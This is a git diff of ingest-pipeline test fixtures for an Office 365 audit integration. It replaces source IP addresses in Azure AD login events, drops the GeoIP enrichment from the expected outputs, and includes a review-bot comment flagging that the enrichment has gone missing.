+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:20\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"73f0a2ef-35be-4a71-9545-59d879fc8fb2\",\"InterSystemsId\":\"d21f6867-0670-4c94-b6fa-bde326fcf3c6\",\"IntraSystemId\":\"1fa4819f-605a-4ebe-a2c3-bc11c3f8e200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -4415,10 +4415,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "79.159.10.151",
+ "ClientIP": "67.43.156.13",
 "CreationTime": "2020-02-12T21:38:20",
 "ExtendedProperties": [
 {
@@ -4468,7 +4468,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3783acda-5ded-4d69-95b6-3df5344c0ce0\",\"InterSystemsId\":\"d5effb7f-9d39-4893-90f6-9cfeec7ed1a7\",\"IntraSystemId\":\"f22a3ad7-22e7-4296-a600-e4e9161a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3783acda-5ded-4d69-95b6-3df5344c0ce0\",\"InterSystemsId\":\"d5effb7f-9d39-4893-90f6-9cfeec7ed1a7\",\"IntraSystemId\":\"f22a3ad7-22e7-4296-a600-e4e9161a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -4486,10 +4486,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "213.97.47.133",
+ "ActorIpAddress": "67.43.156.15",
 "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "213.97.47.133",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-07T16:44:02",
 "ExtendedProperties": [
 {
@@ -4539,7 +4539,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:03\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"f67568b1-64c4-4165-bdd9-16a5b9142eef\",\"InterSystemsId\":\"d960e058-1adb-4a84-a65b-1a6ce367e323\",\"IntraSystemId\":\"1dfdb693-18a1-4cff-aa3e-61feaa356100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:03\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"f67568b1-64c4-4165-bdd9-16a5b9142eef\",\"InterSystemsId\":\"d960e058-1adb-4a84-a65b-1a6ce367e323\",\"IntraSystemId\":\"1dfdb693-18a1-4cff-aa3e-61feaa356100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4557,10 +4557,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:44:03", "ExtendedProperties": [ { 
@@ -4610,7 +4610,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a8114a24-d342-4689-b75e-51e6386763de\",\"InterSystemsId\":\"e2565aaf-91b0-4ccd-8810-743123eb7383\",\"IntraSystemId\":\"21166e08-6589-4c2d-a325-c97ba45f2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a8114a24-d342-4689-b75e-51e6386763de\",\"InterSystemsId\":\"e2565aaf-91b0-4ccd-8810-743123eb7383\",\"IntraSystemId\":\"21166e08-6589-4c2d-a325-c97ba45f2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4628,10 +4628,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:29:02", "ExtendedProperties": [ { 
@@ -4681,7 +4681,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"1eaf9c65-8c67-4cd9-9277-771589113752\",\"InterSystemsId\":\"ede626b9-2035-4d02-8330-201c4ae82af6\",\"IntraSystemId\":\"98612804-9aa6-40a4-b72a-808bc7742000\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"1eaf9c65-8c67-4cd9-9277-771589113752\",\"InterSystemsId\":\"ede626b9-2035-4d02-8330-201c4ae82af6\",\"IntraSystemId\":\"98612804-9aa6-40a4-b72a-808bc7742000\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4699,10 +4699,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:25:21", "ExtendedProperties": [ { 
@@ -4752,7 +4752,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:39\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3c439e46-d454-4767-9320-1e75540821b7\",\"InterSystemsId\":\"fc5c6c90-a6ba-486c-b685-8d67c529d3aa\",\"IntraSystemId\":\"6e184f6f-887b-4410-b24d-723031366000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:39\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3c439e46-d454-4767-9320-1e75540821b7\",\"InterSystemsId\":\"fc5c6c90-a6ba-486c-b685-8d67c529d3aa\",\"IntraSystemId\":\"6e184f6f-887b-4410-b24d-723031366000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4770,10 +4770,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:39", "ExtendedProperties": [ { 
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json index 346c7d2a36e..43ffb7d9847 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json @@ -2,25 +2,7 @@ "expected": [ { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -34,7 +16,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -84,7 +66,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
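Review bot: The rebuilt `source` object at the top of this hunk drops the entire `geo` and `as` enrichment rather than carrying the test database's values for 67.43.156.15, and the same removal appears in the other four `source` hunks of this file (`@@ -140`, `@@ -278`, `@@ -416`, `@@ -554`). Moving the fixtures to the supported IP subset is meant to make that enrichment deterministic, so an expected document holding only `"ip"` suggests the file was regenerated without the test GeoIP database loaded, assuming the ingest pipeline still runs a geoip processor on `source.ip`, which I cannot see from this diff. If the enrichment is still part of the pipeline, regenerate the expected file with the GeoIP test data enabled so the comparison does not fail on the first run that has it; if the geoip step was intentionally removed, note that alongside the IP change in the package changelog.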
@@ -96,12 +78,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051465700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:13\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"ca0efc24-1b89-4962-8fef-a3ac5437302f\",\"InterSystemsId\":\"03616b3a-fc75-46a1-b34a-2d82fc8f1e7e\",\"IntraSystemId\":\"c4206c29-46c2-4a6f-a46b-735107705400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970069Z", + "original": 
